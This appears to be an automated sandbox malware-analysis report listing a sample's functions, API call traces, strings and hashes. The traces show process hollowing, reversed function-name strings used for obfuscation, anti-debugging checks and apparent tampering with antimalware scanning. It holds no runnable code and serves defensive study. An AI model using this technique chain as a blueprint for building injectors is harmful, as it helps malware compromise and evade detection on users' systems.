Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59

Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00413501

Part of subcall function 00413326: __fltout2.LIBCMT ref: 00413352

__cftog_l.LIBCMT ref: 00413527
__cftoe_l.LIBCMT ref: 00413559

Memory Dump Source

Source File: 00000003.00000001.1710492566.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.1710492566.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_nhpoymuP.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89

Function 3250C0A8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 3250C119
GetFocus.USER32 ref: 3250C17F

Strings

Pa3, xrefs: 3250C2B6

Memory Dump Source

Source File: 00000003.00000002.1989485777.0000000032500000.00000040.00000800.00020000.00000000.sdmp, Offset: 32500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32500000_nhpoymuP.jbxd

Similarity

API ID: ActiveFocusWindow
String ID: Pa3
API String ID: 2022189218-2837606130
Opcode ID: e4c4bd152a068bf5ea7b7fa89f4c92d632d3a520476060a92e19407ece56a695
Instruction ID: 81f3aa600f05d8809685f3108ae3c2268f0412293242c09c7d8b3fdd0e6c8ff8
Opcode Fuzzy Hash: e4c4bd152a068bf5ea7b7fa89f4c92d632d3a520476060a92e19407ece56a695
Instruction Fuzzy Hash: D5714CB4A002058FDB04CFA9C984AAABBF5FF49705F558499E844EB361C774EE41CFA1

Analysis Process: Pumyophn.PIFPID: 7584, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	9.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	181
Total number of Limit Nodes:	15

Executed Functions

Function 02CB8BA8 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654
threadnativeinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CB881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02CB8903), ref: 02CB8860
Part of subcall function 02CB881C: GetProcAddress.KERNEL32(02D01384,00000000), ref: 02CB8879
Part of subcall function 02CB881C: FreeLibrary.KERNEL32(02D01384,00000000,02D01388,Function_000055D8,00000004,02D01398,02D01388,000186A3,00000040,02D0139C,02D01384,00000000,00000000,00000000,00000000,02CB8903), ref: 02CB88E3

Part of subcall function 02CB85D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02CB8660

GetThreadContext.KERNEL32(02D013D0,02D01420,ScanString,02D013A4,02CBA774,UacInitialize,02D013A4,02CBA774,ScanBuffer,02D013A4,02CBA774,ScanBuffer,02D013A4,02CBA774,UacInitialize,02D013A4), ref: 02CB943A

Part of subcall function 02CB824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CB82BD

Part of subcall function 02CB84BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02CB8521

Part of subcall function 02CB79AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CB7A1F

Part of subcall function 02CB7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CB7D6C

SetThreadContext.KERNEL32(02D013D0,02D01420,ScanBuffer,02D013A4,02CBA774,ScanString,02D013A4,02CBA774,Initialize,02D013A4,02CBA774,02D013CC,02D014BC,02D014F8,00000004,02D014FC), ref: 02CBA14F
NtResumeThread.NTDLL(02D013D0,00000000), ref: 02CBA15C

Part of subcall function 02CB8798: LoadLibraryW.KERNEL32(?,?), ref: 02CB87AC
Part of subcall function 02CB8798: GetProcAddress.KERNEL32(02D01390,BCryptVerifySignature), ref: 02CB87C6
Part of subcall function 02CB8798: FreeLibrary.KERNEL32(02D01390,02D01390,BCryptVerifySignature,bcrypt,?,02D013D0,00000000,02D013A4,02CBA3BF,ScanString,02D013A4,02CBA774,ScanBuffer,02D013A4,02CBA774,Initialize), ref: 02CB8802

Strings

advapi32, xrefs: 02CBA53D
OpenSession, xrefs: 02CB8BE1, 02CB9004, 02CB90B6, 02CBA487, 02CBA5CD
ntdll, xrefs: 02CBA45D, 02CBA471, 02CBA529, 02CBA6CC, 02CBA6E0
sppc, xrefs: 02CB91AE
UacScan, xrefs: 02CB8CAB, 02CB8EC3, 02CB94BF, 02CB98BB, 02CB9A2F, 02CBA1D9, 02CBA671
dbgcore, xrefs: 02CBA551, 02CBA565
I_QueryTagInformation, xrefs: 02CBA538
MiniDumpReadDumpStream, xrefs: 02CBA560
bcrypt, xrefs: 02CBA3B0, 02CBA3C4, 02CBA3D8
NtReadVirtualMemory, xrefs: 02CBA458
BCryptRegisterProvider, xrefs: 02CBA3D3
Initialize, xrefs: 02CB8F22, 02CB9530, 02CB96B7, 02CB9AA0, 02CB9D02, 02CB9E72, 02CB9FE5, 02CBA24A, 02CBA57B
ScanString, xrefs: 02CB8C3A, 02CB8DE5, 02CB8F93, 02CB93BB, 02CB95A1, 02CB9728, 02CB9BB5, 02CB9D73, 02CB9EE3, 02CBA056, 02CBA341, 02CBA3EE
BCryptVerifySignature, xrefs: 02CBA3AB
UacInitialize, xrefs: 02CB8E6A, 02CB91CB, 02CB934A, 02CB944E, 02CB984A, 02CB99BE, 02CBA168
ScanBuffer, xrefs: 02CB8D04, 02CB8D8C, 02CB9127, 02CB923C, 02CB92D9, 02CB9612, 02CB9799, 02CB992C, 02CB9B11, 02CB9C26, 02CB9DE4, 02CB9F54, 02CBA0C7, 02CBA2BB, 02CBA4D9, 02CBA61F
SLGetLicenseInformation, xrefs: 02CB9197
NtOpenProcess, xrefs: 02CBA6DB
NtSetSecurityObject, xrefs: 02CBA6C7
BCryptQueryProviderRegistration, xrefs: 02CBA3BF
MiniDumpWriteDump, xrefs: 02CBA54C
NtOpenObjectAuditAlarm, xrefs: 02CBA46C, 02CBA524

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: LibraryMemoryThreadVirtual$AddressContextFreeProc$AllocateCreateHandleLoadModuleProcessReadResumeSectionUnmapUserViewWrite
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 59011937-51457883
Opcode ID: 830d7a413e113333aa425e2f077daff31e56efb18f1cb3ce1c110c548520eee7
Instruction ID: 26b71a5ff3025284416378dc28f16e46aa53fda30ac9caba9be391489071dfd3
Opcode Fuzzy Hash: 830d7a413e113333aa425e2f077daff31e56efb18f1cb3ce1c110c548520eee7
Instruction Fuzzy Hash: 55E21C74A4015A9FDB26FBA4DCA0BCE73BABF95304F2041B1E049AB614DA70EE45DF50

Function 02CB8BA6 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CB881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02CB8903), ref: 02CB8860
Part of subcall function 02CB881C: GetProcAddress.KERNEL32(02D01384,00000000), ref: 02CB8879
Part of subcall function 02CB881C: FreeLibrary.KERNEL32(02D01384,00000000,02D01388,Function_000055D8,00000004,02D01398,02D01388,000186A3,00000040,02D0139C,02D01384,00000000,00000000,00000000,00000000,02CB8903), ref: 02CB88E3

Part of subcall function 02CB85D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02CB8660

GetThreadContext.KERNEL32(02D013D0,02D01420,ScanString,02D013A4,02CBA774,UacInitialize,02D013A4,02CBA774,ScanBuffer,02D013A4,02CBA774,ScanBuffer,02D013A4,02CBA774,UacInitialize,02D013A4), ref: 02CB943A

Part of subcall function 02CB824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CB82BD

Part of subcall function 02CB84BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02CB8521

Part of subcall function 02CB79AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CB7A1F

Strings

advapi32, xrefs: 02CBA53D
OpenSession, xrefs: 02CB8BE1, 02CB9004, 02CB90B6, 02CBA487, 02CBA5CD
ntdll, xrefs: 02CBA45D, 02CBA471, 02CBA529, 02CBA6CC, 02CBA6E0
sppc, xrefs: 02CB91AE
UacScan, xrefs: 02CB8CAB, 02CB8EC3, 02CB94BF, 02CB98BB, 02CB9A2F, 02CBA1D9, 02CBA671
dbgcore, xrefs: 02CBA551, 02CBA565
I_QueryTagInformation, xrefs: 02CBA538
MiniDumpReadDumpStream, xrefs: 02CBA560
bcrypt, xrefs: 02CBA3B0, 02CBA3C4, 02CBA3D8
NtReadVirtualMemory, xrefs: 02CBA458
BCryptRegisterProvider, xrefs: 02CBA3D3
Initialize, xrefs: 02CB8F22, 02CB9530, 02CB96B7, 02CB9AA0, 02CB9D02, 02CB9E72, 02CB9FE5, 02CBA24A, 02CBA57B
ScanString, xrefs: 02CB8C3A, 02CB8DE5, 02CB8F93, 02CB93BB, 02CB95A1, 02CB9728, 02CB9BB5, 02CB9D73, 02CB9EE3, 02CBA056, 02CBA341, 02CBA3EE
BCryptVerifySignature, xrefs: 02CBA3AB
UacInitialize, xrefs: 02CB8E6A, 02CB91CB, 02CB934A, 02CB944E, 02CBA168
ScanBuffer, xrefs: 02CB8D04, 02CB8D8C, 02CB9127, 02CB923C, 02CB92D9, 02CB9612, 02CB9799, 02CB992C, 02CB9B11, 02CB9C26, 02CB9DE4, 02CB9F54, 02CBA0C7, 02CBA2BB, 02CBA4D9, 02CBA61F
SLGetLicenseInformation, xrefs: 02CB9197
NtOpenProcess, xrefs: 02CBA6DB
NtSetSecurityObject, xrefs: 02CBA6C7
BCryptQueryProviderRegistration, xrefs: 02CBA3BF
MiniDumpWriteDump, xrefs: 02CBA54C
NtOpenObjectAuditAlarm, xrefs: 02CBA46C, 02CBA524

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: MemoryVirtual$AddressAllocateContextCreateFreeHandleLibraryModuleProcProcessReadSectionThreadUnmapUserView
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 1291004003-51457883
Opcode ID: 0ff13228e9e2792e90bbddd006e9b686dc7be0bbc1fbf139b6af7cdc65b87ae9
Instruction ID: 5d39d8dd05e76cf5649b2d7c7aba343d8ebb1dad9459bc5517521e5697ea4d48
Opcode Fuzzy Hash: 0ff13228e9e2792e90bbddd006e9b686dc7be0bbc1fbf139b6af7cdc65b87ae9
Instruction Fuzzy Hash: 7DE21C74A4015A9FDB26FBA4DCA0BDE73BABF94304F2041B1E049AB614DA70EE45DF50

Function 02CA5A78 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 02CA5A94
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02CA5AB2
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02CA5AD0
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02CA5AEE
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02CA5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02CA5B37
RegQueryValueExA.ADVAPI32(?,02CA5CE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02CA5B7D,?,80000001), ref: 02CA5B55
RegCloseKey.ADVAPI32(?,02CA5B84,00000000,00000000,00000005,00000000,02CA5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02CA5B77
lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02CA5B94
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105), ref: 02CA5BA1
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105), ref: 02CA5BA7
lstrlen.KERNEL32(00000000), ref: 02CA5BD2
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02CA5C19
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02CA5C29
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02CA5C51
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02CA5C61
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02CA5C87
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02CA5C97

Strings

., xrefs: 02CA5BE4
Software\Borland\Locales, xrefs: 02CA5AA8, 02CA5AC6
Software\Borland\Delphi\Locales, xrefs: 02CA5AE4

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-3917250287
Opcode ID: 3efbe3085bef817c60ff75bd00057aec72736ca0c852fd406e889abd8b3e1fa0
Instruction ID: 5937fb6097ccb3977c3ac1620f63d0953d950ef6c84c059d88d924cb67107c1d
Opcode Fuzzy Hash: 3efbe3085bef817c60ff75bd00057aec72736ca0c852fd406e889abd8b3e1fa0
Instruction Fuzzy Hash: 4751C371E4021E7EFB21D6A49C56FEF77AD9B0878CF8441A1AA04E6180D7B4DB448FA0

Function 02CB79AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CB8018: GetModuleHandleA.KERNELBASE(?), ref: 02CB806A

Part of subcall function 02CB80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CB8113
Part of subcall function 02CB80C0: GetProcAddress.KERNEL32(?,?), ref: 02CB8125

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CB7A1F

Strings

yromeMlautriVetacollAwZ, xrefs: 02CB79C7
ntdll, xrefs: 02CB79F4

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: AddressProc$AllocateHandleMemoryModuleVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 1888340430-445027087
Opcode ID: 7d82f851b50b82fa07d02196cc46040d521e0eab8a09eb8c21b50727018a9894
Instruction ID: 7434a8be9316a8e3a123efecbaf2498f264ecf9670c00c971bb5419fbce4d948
Opcode Fuzzy Hash: 7d82f851b50b82fa07d02196cc46040d521e0eab8a09eb8c21b50727018a9894
Instruction Fuzzy Hash: 8F115776680209AFEB11EFA4DC91FEEB7AEEF89710F414420B904D7640DA70EE149B60

Function 02CB79AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CB8018: GetModuleHandleA.KERNELBASE(?), ref: 02CB806A

Part of subcall function 02CB80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CB8113
Part of subcall function 02CB80C0: GetProcAddress.KERNEL32(?,?), ref: 02CB8125

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CB7A1F

Strings

yromeMlautriVetacollAwZ, xrefs: 02CB79C7
ntdll, xrefs: 02CB79F4

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: AddressProc$AllocateHandleMemoryModuleVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 1888340430-445027087
Opcode ID: 9ad2761e5496f38cf2072716f2b55aaa8a9cf475e50a70e6455c43cfd679f5d4
Instruction ID: b4937ef74b545f6546cb68df8643dd7aa14771f49ff316e83132bf8861d00be8
Opcode Fuzzy Hash: 9ad2761e5496f38cf2072716f2b55aaa8a9cf475e50a70e6455c43cfd679f5d4
Instruction Fuzzy Hash: 72116976680209AFEB11EFA4DC91FDEB7AEEF89710F414420B904D7640DA70EE14DB60

Function 02CB824C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CB8018: GetModuleHandleA.KERNELBASE(?), ref: 02CB806A

Part of subcall function 02CB80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CB8113
Part of subcall function 02CB80C0: GetProcAddress.KERNEL32(?,?), ref: 02CB8125

NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CB82BD

Strings

yromeMlautriVdaeRtN, xrefs: 02CB8267
ntdll, xrefs: 02CB8294

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: AddressProc$HandleMemoryModuleReadVirtual
String ID: ntdll$yromeMlautriVdaeRtN
API String ID: 36784810-737317276
Opcode ID: 2d511741ee2e119bc3ea35188f09c762f7ea2a055ff8e154f9fd22ce320739a3
Instruction ID: 5cb733d1c2a166673c2334d64f6561bcf486ea76593a8499d9253d187d7e8710
Opcode Fuzzy Hash: 2d511741ee2e119bc3ea35188f09c762f7ea2a055ff8e154f9fd22ce320739a3
Instruction Fuzzy Hash: CC016579A00208AFEB11EFA8D891F9AB7EEEF88704F418820F804D7600C670ED109B64

Function 02CB7CF8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CB8018: GetModuleHandleA.KERNELBASE(?), ref: 02CB806A

Part of subcall function 02CB80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CB8113
Part of subcall function 02CB80C0: GetProcAddress.KERNEL32(?,?), ref: 02CB8125

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CB7D6C

Strings

Ntdll, xrefs: 02CB7D43
yromeMlautriVetirW, xrefs: 02CB7D13

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: AddressProc$HandleMemoryModuleVirtualWrite
String ID: Ntdll$yromeMlautriVetirW
API String ID: 1525300337-3542721025
Opcode ID: 1d17a9095a943f585665250cc09ffe4749e5d47cf9f3f17fa8ad265a8e8c28bc
Instruction ID: 58eed5a490bb753a706d33ede091985ab62af2cf5081aff8fc8c9204b30e9058
Opcode Fuzzy Hash: 1d17a9095a943f585665250cc09ffe4749e5d47cf9f3f17fa8ad265a8e8c28bc
Instruction Fuzzy Hash: 78012975640209AFEB12EFA8D891EAAB7EDEF8C750F514460B904E7690C670ED149B60

Function 02CB84BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02CB8018: GetModuleHandleA.KERNELBASE(?), ref: 02CB806A

Part of subcall function 02CB80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CB8113
Part of subcall function 02CB80C0: GetProcAddress.KERNEL32(?,?), ref: 02CB8125

NtUnmapViewOfSection.NTDLL(?,?), ref: 02CB8521

Strings

noitceSfOweiVpamnUtN, xrefs: 02CB84D7
ntdll, xrefs: 02CB8504

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: AddressProc$HandleModuleSectionUnmapView
String ID: noitceSfOweiVpamnUtN$ntdll
API String ID: 858119152-2520021413
Opcode ID: bd1943c0b75fd1b2374fc0edffd9b4fb0cc2d78b520986b2f6146b8fa3bb77c8
Instruction ID: d79b844a9d183540f2c3b5e475b25b4c5a99e78a9a4522163512b8e5b9552613
Opcode Fuzzy Hash: bd1943c0b75fd1b2374fc0edffd9b4fb0cc2d78b520986b2f6146b8fa3bb77c8
Instruction Fuzzy Hash: 1701A274640208AFEB15EFA4D891F9EB7AEEF49714F514920F405D7650CA70ED04EF60

Function 02CBDAC4 Relevance: 4.6, APIs: 3, Instructions: 80nativefileCOMMON

Download Yara Rule

APIs

RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02CBDB03
NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 02CBDB6A
NtClose.NTDLL(?), ref: 02CBDB73

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: Path$CloseFileNameName_Write
String ID:
API String ID: 1792072161-0
Opcode ID: af274b23391a989dc6e36e93a1d537a836401b3eda9da469658c21d1aa61ebaa
Instruction ID: aab70fc1aaeee13cff684a462bc44ab0d42cf988cff267f68fdafec82773eb7f
Opcode Fuzzy Hash: af274b23391a989dc6e36e93a1d537a836401b3eda9da469658c21d1aa61ebaa
Instruction Fuzzy Hash: 1721ED71E40349BAEB25EAE4CC52FDEB7BDAF04B04F604161B605F71C0D7B46A04DAA5

Function 02CBD9E8 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON

Download Yara Rule

APIs

RtlInitUnicodeString.NTDLL ref: 02CBDA64
RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 02CBDA7A
NtDeleteFile.NTDLL(?), ref: 02CBDA99

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: Path$DeleteFileInitNameName_StringUnicode
String ID:
API String ID: 1459852867-0
Opcode ID: 2ec7d2ec1044f0e515f9329b8ba5a4dca3a1cf8dfdd29ffe7591e76a533073fb
Instruction ID: a18dc04a5b5bb57e9cd2024241c0505b80db5179b5f01b98dec46f1ae094f3ea
Opcode Fuzzy Hash: 2ec7d2ec1044f0e515f9329b8ba5a4dca3a1cf8dfdd29ffe7591e76a533073fb
Instruction Fuzzy Hash: E1016275988349AEEF06E7E0C951BCD7BBDAF46704F5040A2E212E6082DA74AB05DB21

Function 02CBDA3C Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON

Download Yara Rule

APIs

RtlInitUnicodeString.NTDLL ref: 02CBDA64
RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 02CBDA7A
NtDeleteFile.NTDLL(?), ref: 02CBDA99

Part of subcall function 02CA4C0C: SysFreeString.OLEAUT32(?), ref: 02CA4C1A

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: PathString$DeleteFileFreeInitNameName_Unicode
String ID:
API String ID: 2256775434-0
Opcode ID: b84e0480f9b81f8633737735ffe3b969bf14547bea89f5b9705228205975be67
Instruction ID: f0c7f622fa203f4797a6e17aebc460b086c1e1baedf4fb225b4f21acf0b0f91d
Opcode Fuzzy Hash: b84e0480f9b81f8633737735ffe3b969bf14547bea89f5b9705228205975be67
Instruction Fuzzy Hash: 91014475944309BADB15EBE0CC51FCEB7BDEF49700F504471E505E2180EB746B049A60

Function 02CBDBA8 Relevance: 3.1, APIs: 2, Instructions: 80nativeCOMMON

Download Yara Rule

APIs

RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02CBDBE3
NtClose.NTDLL(?), ref: 02CBDC5D

Part of subcall function 02CA4C0C: SysFreeString.OLEAUT32(?), ref: 02CA4C1A

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: Path$CloseFreeNameName_String
String ID:
API String ID: 11680810-0
Opcode ID: a18e9af5566c1ce4ebc9f61046bf3c6621f59026c749458510a6b1afa78a25ba
Instruction ID: f57e5b906e25c533f89dc9f6a1f03c88bb0cffb5226e39058f1fbcb9829fd885
Opcode Fuzzy Hash: a18e9af5566c1ce4ebc9f61046bf3c6621f59026c749458510a6b1afa78a25ba
Instruction Fuzzy Hash: 49210371A40309BAEB15EAE4CC56FDEB7BDAF08704F500561B601F71C0D6B4AA059B95

Function 02CBEC6C Relevance: 236.3, APIs: 9, Strings: 120, Instructions: 10535filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 02CB881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02CB8903), ref: 02CB8860
Part of subcall function 02CB881C: GetProcAddress.KERNEL32(02D01384,00000000), ref: 02CB8879
Part of subcall function 02CB881C: FreeLibrary.KERNEL32(02D01384,00000000,02D01388,Function_000055D8,00000004,02D01398,02D01388,000186A3,00000040,02D0139C,02D01384,00000000,00000000,00000000,00000000,02CB8903), ref: 02CB88E3

Part of subcall function 02CBEB8C: GetModuleHandleW.KERNEL32(KernelBase,?,02CBEF90,UacInitialize,02CFCF00,02CCAFD0,UacScan,02CFCF00,02CCAFD0,ScanBuffer,02CFCF00,02CCAFD0,OpenSession,02CFCF00,02CCAFD0,ScanString), ref: 02CBEB92
Part of subcall function 02CBEB8C: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02CBEBA4

Part of subcall function 02CBEBE8: GetModuleHandleW.KERNEL32(KernelBase), ref: 02CBEBF8
Part of subcall function 02CBEBE8: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02CBEC0A
Part of subcall function 02CBEBE8: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02CBEC21

Part of subcall function 02CAC2E4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02DF58C8,?,02CBFBF6,ScanBuffer,02CFCF00,02CCAFD0,OpenSession,02CFCF00,02CCAFD0,ScanBuffer,02CFCF00,02CCAFD0,OpenSession), ref: 02CAC2FB

Part of subcall function 02CBDBA8: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02CBDBE3
